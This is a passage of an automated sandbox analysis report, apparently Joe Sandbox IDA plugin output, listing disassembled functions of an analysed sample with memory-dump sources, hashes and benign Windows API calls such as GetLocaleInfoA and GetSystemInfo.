                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset
                                                                                  • String ID:
                                                                                  • API String ID: 2102423945-0
                                                                                  • Opcode ID: 7efe12d2f841d686b92edbd5c92c72371cabb6cfabb00f875f9a440434965a92
                                                                                  • Instruction ID: fdf5b737d45751501547b1d7014a905f6ac86e90f12f81d0687a38e3a9c4f95e
                                                                                  • Opcode Fuzzy Hash: 7efe12d2f841d686b92edbd5c92c72371cabb6cfabb00f875f9a440434965a92
                                                                                  • Instruction Fuzzy Hash: 8892A375605A028FD72CCF0AD590966F7E2FF88314328C96DD0AB87B59DA34B456CF84
                                                                                  Function 6A6F9A96 Relevance: 2.0, APIs: 1, Instructions: 452COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog3
                                                                                  • String ID:
                                                                                  • API String ID: 431132790-0
                                                                                  • Opcode ID: 613cedce7ab40510beee1a3c61925853b6e459a98a93c03b344ffb24d8ed5db2
                                                                                  • Instruction ID: 197b8a6cba358e30b91ab96ff8265393cd022755d5b2ccd7d1d2f60d19adef51
                                                                                  • Opcode Fuzzy Hash: 613cedce7ab40510beee1a3c61925853b6e459a98a93c03b344ffb24d8ed5db2
                                                                                  • Instruction Fuzzy Hash: 48F18D71605209FFDB24CF68C894EEE7BAAEF05318F018919F8559B292DF35D902CB64
                                                                                  Function 6A6EB170 Relevance: 1.6, Strings: 1, Instructions: 371COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @
                                                                                  • API String ID: 0-2766056989
                                                                                  • Opcode ID: a3a3a2ed2c204b921976b6432812c7ff27d72dac3b8db0a23bc4fb179a171c16
                                                                                  • Instruction ID: c40558f35bf729f3d29089e7da38c728cb739b4fe0b45a9117d128a7d8e9bbb4
                                                                                  • Opcode Fuzzy Hash: a3a3a2ed2c204b921976b6432812c7ff27d72dac3b8db0a23bc4fb179a171c16
                                                                                  • Instruction Fuzzy Hash: D2E1687160E3468FC354DF68C08066EB7E1FF89304F14892DE59987392EB75E989CB82
                                                                                  Function 0BE9BBAE Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 0BE9BBDC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: DiskFreeSpace
                                                                                  • String ID:
                                                                                  • API String ID: 1705453755-0
                                                                                  • Opcode ID: ecbae96b16a937ee9cecdf9535712b553bd15bbfef93f1f0ab8a3b26c268133e
                                                                                  • Instruction ID: c12eee1264cdec1247075eb3098e84d033af7f81509ca9fb51214c8dc8346be3
                                                                                  • Opcode Fuzzy Hash: ecbae96b16a937ee9cecdf9535712b553bd15bbfef93f1f0ab8a3b26c268133e
                                                                                  • Instruction Fuzzy Hash: 2811AFB1E00109EF9B44CFA9D9819EFF7F9FF8C300B148566A519E7250E6319A058BA0
                                                                                  Function 0BEAAC90 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • FindResourceA.KERNEL32(?,00000000,0000000A), ref: 0BEAACB2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: FindResource
                                                                                  • String ID:
                                                                                  • API String ID: 1635176832-0
                                                                                  • Opcode ID: 03dbba5f51b30bbfe3fee0cb0d38b4ad34bb6af81c4c22b0552003047b7a0ff6
                                                                                  • Instruction ID: 913aa9e30047c9fc6078e75aff269738d2c3152c8bb5f8f26ccba8719f366553
                                                                                  • Opcode Fuzzy Hash: 03dbba5f51b30bbfe3fee0cb0d38b4ad34bb6af81c4c22b0552003047b7a0ff6
                                                                                  • Instruction Fuzzy Hash: B0012671304300AFE701DF6AEC92D2AB7EEEB8A718712A479F500CB340EA31EC01C660
                                                                                  Function 0BE96D4C Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0BE96DB2), ref: 0BE96D72
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoLocale
                                                                                  • String ID:
                                                                                  • API String ID: 2299586839-0
                                                                                  • Opcode ID: d6404e28d5fded3a1c44c1f06d7e5ea6aba51a7cc097698c62ca3ebc278c821b
                                                                                  • Instruction ID: b06b66f6de06850a4f9685d44ba74c9f58ebe36b15a93ad8721cc3e6e1a57452
                                                                                  • Opcode Fuzzy Hash: d6404e28d5fded3a1c44c1f06d7e5ea6aba51a7cc097698c62ca3ebc278c821b
                                                                                  • Instruction Fuzzy Hash: 2FF0C234A04309AFEF14EFE1DC52AEEB3BAFB84710F409935912097680E7B42A088694
                                                                                  Function 0BEB5E38 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetSystemInfo.KERNEL32(?), ref: 0BEB5E48
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoSystem
                                                                                  • String ID:
                                                                                  • API String ID: 31276548-0
                                                                                  • Opcode ID: 57a96c3a3f1b1ee8e1f46a4ce6f1beca87aedfa152dd1818a73d7725729c880d
                                                                                  • Instruction ID: edd4f34a463c573fca11eff0f921923f896f9110a149c82900ccfb51c321538b
                                                                                  • Opcode Fuzzy Hash: 57a96c3a3f1b1ee8e1f46a4ce6f1beca87aedfa152dd1818a73d7725729c880d
                                                                                  • Instruction Fuzzy Hash: 5FF06271E012099FCB15DF98C494CDEB7B4FB66241B44529AD404D7251EB30E954CB80
                                                                                  Function 0BE9E548 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0BE9E566
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoLocale
                                                                                  • String ID:
                                                                                  • API String ID: 2299586839-0
                                                                                  • Opcode ID: cc7f4696d2fbe55a68bea8542f61fabab6a047a6708a8a252cdfd032cba9a492
                                                                                  • Instruction ID: d9d96a41f00cd85e2ff01f976d5df007bb40164b861c305a563ccc3edbc85683
                                                                                  • Opcode Fuzzy Hash: cc7f4696d2fbe55a68bea8542f61fabab6a047a6708a8a252cdfd032cba9a492
                                                                                  • Instruction Fuzzy Hash: ABE0D8717002181BDB14E659BC819F6736C9B58710F00516AFE04C7384FDA0DD4C47E5
                                                                                  Function 0BE9E594 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetLocaleInfoA.KERNEL32(?,?,?,00000002), ref: 0BE9E5A7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoLocale
                                                                                  • String ID:
                                                                                  • API String ID: 2299586839-0
                                                                                  • Opcode ID: 184cd4d49040ef2ec0beb867f12931ab50704c4e6224ce4042edadd2b2c6d73d
                                                                                  • Instruction ID: 615c2bc73594337600b434f4779541f7bae123f47b8a59f007462618c50f6d3d
                                                                                  • Opcode Fuzzy Hash: 184cd4d49040ef2ec0beb867f12931ab50704c4e6224ce4042edadd2b2c6d73d
                                                                                  • Instruction Fuzzy Hash: 87D05E6630D2503AA714955A7D84DBB4A9CCAC56A5F045139FA48C6240E200CC0E93B1
                                                                                  Function 0BE9CFD4 Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: LocalTime
                                                                                  • String ID:
                                                                                  • API String ID: 481472006-0
                                                                                  • Opcode ID: bc6e9ae72df0d9a46cdbdd3828ad5e3a86ee3cd46294671989785471ecea8baf
                                                                                  • Instruction ID: 8f1ea119c18e458d16307bbfda7fa729aac1afac2fe91b85c394d81c39ef1e98
                                                                                  • Opcode Fuzzy Hash: bc6e9ae72df0d9a46cdbdd3828ad5e3a86ee3cd46294671989785471ecea8baf
                                                                                  • Instruction Fuzzy Hash: E0A011088088020A8A8033280C032AC3080A802A20FC80B80ACB8203E0EA2A0A2882AB
                                                                                  Function 0BF75D30 Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
